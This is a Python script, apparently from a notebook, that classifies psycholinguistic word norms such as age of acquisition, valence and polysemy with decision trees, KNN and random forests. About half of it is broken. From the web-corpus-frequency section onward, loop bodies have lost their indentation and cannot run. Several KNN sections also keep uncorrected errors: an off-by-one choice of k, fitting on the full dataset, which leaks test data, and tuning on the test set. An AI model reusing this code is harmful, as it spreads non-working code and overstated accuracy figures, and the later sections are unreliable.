# Grow a full tree, then extract the candidate ccp_alpha values.
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
# Drop the last alpha: it prunes the tree down to the root alone.
ccp_alphas = ccp_alphas[:-1]
# One tree per candidate alpha, to chart train/test accuracy vs alpha.
clf_dts=[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
# Pick the alpha with the best mean 10-fold cross-validated accuracy.
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
    scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
    alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
                   y='mean_accuracy',
                   marker='o',
                   linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
# Refit the pruned tree with the selected alpha and evaluate on the test set.
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
# NOTE(review): plot_confusion_matrix was removed in scikit-learn 1.2;
# newer versions need ConfusionMatrixDisplay.from_estimator instead.
# NOTE(review): the display labels are misspelled ('perceivable') — left
# as-is here since changing them alters the rendered figure.
plot_confusion_matrix(clf_dt_pruned,
                      X_test,
                      y_test,
                      display_labels=['not peveivable','perveivable'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
          filled=True,
          rounded=True,
          class_names=["not perceivable","perceivable"],
          feature_names=X.columns)
# NOTE(review): the train-set predictions are discarded — y_pred is
# immediately overwritten with the test-set predictions.
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
# ROC curve of the pruned Gini tree on the test split.
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
# Keep the pruned Gini tree's ROC (y_score is still its probabilities)
# under the _0 names for the combined comparison plot below.
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
# Repeat the pruning procedure with the entropy split criterion.
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
# NOTE(review): these per-alpha scores are computed but never used in
# this section (the accuracy-vs-alpha chart is only drawn for Gini).
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
# Select the alpha with the best mean 10-fold CV accuracy.
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
    scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
    alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
# Refit the pruned entropy tree and keep its ROC under the _en names.
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
# KNN: sweep k = 1..39 and keep the k with the best test-set accuracy.
# NOTE(review): model selection uses the test set itself, so the test
# metrics below are optimistically biased.
acc = []
# Will take some time
for i in range(1,40):
    neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
    yhat = neigh.predict(X_test)
    acc.append(metrics.accuracy_score(y_test, yhat))
# BUG FIX: acc[0] holds the score for k=1, so the best k is index + 1.
# The original passed the raw index (off by one; ValueError when k=1 wins).
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)) + 1)
# BUG FIX: fit on the training split only; the original fit on the full
# (X, y), leaking the test set into the model.
clf_knn.fit(X_train, y_train)
# ROC curve + report on the held-out test split.
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Random forest baseline for the same target, then overlay all four ROCs.
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
# Combined ROC comparison: Gini tree, entropy tree, KNN, random forest.
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
# Chance diagonal for reference.
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Age of Aquisition (binary)"""
refvar="aoa"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
# --- Decision tree (Gini) with cost-complexity pruning ---
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
# Drop the last alpha: it prunes the tree down to the root alone.
ccp_alphas = ccp_alphas[:-1]
# One tree per candidate alpha, to chart train/test accuracy vs alpha.
clf_dts=[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
# Pick the alpha with the best mean 10-fold cross-validated accuracy.
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
    scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
    alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
                   y='mean_accuracy',
                   marker='o',
                   linestyle='-')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
# Refit the pruned tree with the selected alpha and evaluate on the test set.
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
# NOTE(review): plot_confusion_matrix was removed in scikit-learn 1.2;
# newer versions need ConfusionMatrixDisplay.from_estimator instead.
plot_confusion_matrix(clf_dt_pruned,
                      X_test,
                      y_test,
                      display_labels=['younger','older'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
          filled=True,
          rounded=True,
          class_names=["younger","older"],
          feature_names=X.columns)
# NOTE(review): the train-set predictions are discarded — y_pred is
# immediately overwritten with the test-set predictions.
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
# ROC curve of the pruned Gini tree on the test split.
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
# Keep the pruned Gini tree's ROC (y_score is still its probabilities)
# under the _0 names for the combined comparison plot below.
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
# Repeat the pruning procedure with the entropy split criterion.
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
# NOTE(review): these per-alpha scores are computed but never used in
# this section.
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
# Select the alpha with the best mean 10-fold CV accuracy.
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
    scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
    alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
# Refit the pruned entropy tree and keep its ROC under the _en names.
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
# KNN: sweep k = 1..39 and keep the k with the best test-set accuracy.
# NOTE(review): model selection uses the test set itself, so the test
# metrics below are optimistically biased.
acc = []
# Will take some time
for i in range(1,40):
    neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
    yhat = neigh.predict(X_test)
    acc.append(metrics.accuracy_score(y_test, yhat))
# BUG FIX: acc[0] holds the score for k=1, so the best k is index + 1.
# The original passed the raw index (off by one; ValueError when k=1 wins).
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)) + 1)
# BUG FIX: fit on the training split only; the original fit on the full
# (X, y), leaking the test set into the model.
clf_knn.fit(X_train, y_train)
# ROC curve + report on the held-out test split.
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Random forest baseline for the same target, then overlay all four ROCs.
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
# Combined ROC comparison: Gini tree, entropy tree, KNN, random forest.
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
# Chance diagonal for reference.
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Web Corpus Frequency"""
refvar="web_corpus_freq"
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
yerr='std',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['4','5','6','7','8','9'],
)
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=['4','5','6','7','8','9'],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average=None))
print(classification_report(y_test, y_pred))
print(clf_dt_pruned.predict_proba(X_test))
report = classification_report(y_test, y_pred, output_dict=True)
export = pd.DataFrame(report).transpose()
print(export.to_latex())
"""## 3.2 Classification by KNN
### Age of Aquisition
#### choice of k
"""
refvar="aoa"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
k = 4
neigh = KNeighborsClassifier(n_neighbors = k).fit(X_train,y_train)
Pred_y = neigh.predict(X_test)
error_rate = []
for i in range(1,100):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(X_train,y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i != y_test))
plt.figure(figsize=(10,6))
plt.plot(range(1,100),error_rate,color='blue', linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('Error Rate vs. K Value')
plt.xlabel('K')
plt.ylabel('Error Rate')
print("Minimum error:-",min(error_rate),"at K =",error_rate.index(min(error_rate)))
acc = []
# Will take some time
from sklearn import metrics
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.f1_score(y_test, yhat))
plt.figure(figsize=(10,6))
plt.plot(range(1,40),acc,color = 'blue',linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('accuracy vs. K Value')
plt.xlabel('K')
plt.ylabel('Accuracy')
print("Maximum accuracy:-",max(acc),"at K =",acc.index(max(acc)))
refvar="aoa"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_knn = KNeighborsClassifier(n_neighbors=error_rate.index(min(error_rate)))
clf_knn.fit(X, y)
# apply KNN to train set
y_pred = clf_knn.predict(X_train)
y_pred[:5]
y_train.values[:5]
print('Accuracy', accuracy_score(y_train, y_pred))
print('F1', f1_score(y_train, y_pred, average='weighted'))
print( classification_report(y_train, y_pred) )
# Confusion matrix for trainset
# TP, FN, FP, TN
confusion_matrix(y_train, y_pred)
# apply KNN to test set
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average='weighted'))
print(classification_report(y_test, y_pred))
print(confusion_matrix(y_test, y_pred))
plot_confusion_matrix(clf_knn,
X_test,
y_test,
display_labels=['younger','older'])
y_score = clf_knn.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Valence
#### choice of k
"""
from sklearn.neighbors import KNeighborsClassifier
refvar="valence"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
k = 4
neigh = KNeighborsClassifier(n_neighbors = k).fit(X_train,y_train)
Pred_y = neigh.predict(X_test)
error_rate = []
for i in range(1,100):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(X_train,y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i != y_test))
plt.figure(figsize=(10,6))
plt.plot(range(1,100),error_rate,color='blue', linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('Error Rate vs. K Value')
plt.xlabel('K')
plt.ylabel('Error Rate')
print("Minimum error:-",min(error_rate),"at K =",error_rate.index(min(error_rate)))
acc = []
# Will take some time
from sklearn import metrics
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
plt.figure(figsize=(10,6))
plt.plot(range(1,40),acc,color = 'blue',linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('accuracy vs. K Value')
plt.xlabel('K')
plt.ylabel('Accuracy')
print("Maximum accuracy:-",max(acc),"at K =",acc.index(max(acc)))
refvar="valence"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_knn = KNeighborsClassifier(n_neighbors=error_rate.index(min(error_rate)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
print('Accuracy', accuracy_score(y_train, y_pred))
print('F1', f1_score(y_train, y_pred, average='weighted'))
print( classification_report(y_train, y_pred) )
confusion_matrix(y_train, y_pred)
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average='weighted'))
print(classification_report(y_test, y_pred))
print(confusion_matrix(y_test, y_pred))
plot_confusion_matrix(clf_knn,
X_test,
y_test,
display_labels=['not valuable','valuable'])
y_score = clf_knn.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Polysemy
#### choice of k
"""
from sklearn.neighbors import KNeighborsClassifier
refvar="polysemy"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
k = 4
neigh = KNeighborsClassifier(n_neighbors = k).fit(X_train,y_train)
Pred_y = neigh.predict(X_test)
error_rate = []
for i in range(1,100):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(X_train,y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i != y_test))
plt.figure(figsize=(10,6))
plt.plot(range(1,100),error_rate,color='blue', linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('Error Rate vs. K Value')
plt.xlabel('K')
plt.ylabel('Error Rate')
print("Minimum error:-",min(error_rate),"at K =",error_rate.index(min(error_rate)))
acc = []
# Will take some time
from sklearn import metrics
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.average_precision_score(y_test, yhat))
plt.figure(figsize=(10,6))
plt.plot(range(1,40),acc,color = 'blue',linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('F1 score vs. K Value')
plt.xlabel('K')
plt.ylabel('F1 Score')
print("Maximum F1:-",max(acc),"at K =",acc.index(max(acc)))
refvar="polysemy"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
print('Accuracy', accuracy_score(y_train, y_pred))
print('F1', f1_score(y_train, y_pred, average='weighted'))
print( classification_report(y_train, y_pred) )
confusion_matrix(y_train, y_pred)
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average='weighted'))
print(classification_report(y_test, y_pred))
print(confusion_matrix(y_test, y_pred))
plot_confusion_matrix(clf_knn,
X_test,
y_test,
display_labels=['not polysemic','polysemic'])
y_score = clf_knn.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""## Random Forest
### Valence
"""
refvar='valence'
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
# Instantiate model with 10 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
#TESTING THE MODEL BY PREDICTING ON TEST DATA
#AND CALCULATE THE ACCURACY SCORE
prediction_test = model.predict(X_test)
#print(y_test, prediction_test)
#Print the prediction accuracy
print ("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
#Test accuracy for various test sizes and see how it gets better with more training data
#One amazing feature of Random forest is that it provides us info on feature importances
# Get numerical feature importances
#importances = list(model.feature_importances_)
#Let us print them into a nice format.
feature_list = list(X.columns)
feature_imp = pd.Series(model.feature_importances_,index=feature_list).sort_values(ascending=False)
print(feature_imp)
y_pred = model.predict(X_train)
y_pred = model.predict(X_test)
plot_confusion_matrix(ra,
X_test,
y_test,
display_labels=['not val','val'],
)
y_score = model.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
